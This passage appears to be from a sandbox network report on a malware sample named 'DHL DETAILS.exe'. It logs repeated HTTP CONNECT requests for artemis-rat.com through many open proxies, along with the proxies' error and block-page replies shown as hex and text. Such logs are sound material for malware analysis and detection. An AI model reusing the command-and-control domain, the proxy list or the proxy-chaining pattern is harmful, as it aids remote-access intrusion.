582	192.168.2.5	51682	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.630615950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
583	192.168.2.5	51763	38.54.101.254	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.631839991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.812968016 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
584	192.168.2.5	51641	89.218.8.152	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.638541937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.442481995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
585	192.168.2.5	51673	139.129.162.65	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.656234980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.038139105 CET	1286	IN	HTTP/1.1 503 Service Unavailable Server: squid/3.3.8 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 3556 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
586	192.168.2.5	51808	198.57.211.235	11096	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.658224106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.114342928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.677819967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781399965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.974019051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177413940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
587	192.168.2.5	51700	8.130.39.155	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.659204960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.348722935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.334244013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333462000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.885083914 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
588	192.168.2.5	51691	128.199.196.31	38832	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.660527945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
589	192.168.2.5	51706	193.239.56.84	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.661227942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
590	192.168.2.5	51716	47.56.110.204	8989	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.661714077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.979192972 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 11:59:19 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
591	192.168.2.5	51646	90.188.250.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.664478064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
592	192.168.2.5	51993	8.213.128.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.666614056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
593	192.168.2.5	51996	8.213.128.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.668745041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
594	192.168.2.5	51999	8.213.128.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.670644045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
595	192.168.2.5	51841	162.159.242.158	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.671068907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.832056999 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
596	192.168.2.5	51856	104.16.81.76	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.675703049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.830692053 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
597	192.168.2.5	51704	39.108.229.14	8002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.675965071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.018224001 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
598	192.168.2.5	51712	120.77.148.138	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.681341887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.019032001 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
599	192.168.2.5	51873	172.67.35.15	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.683753967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
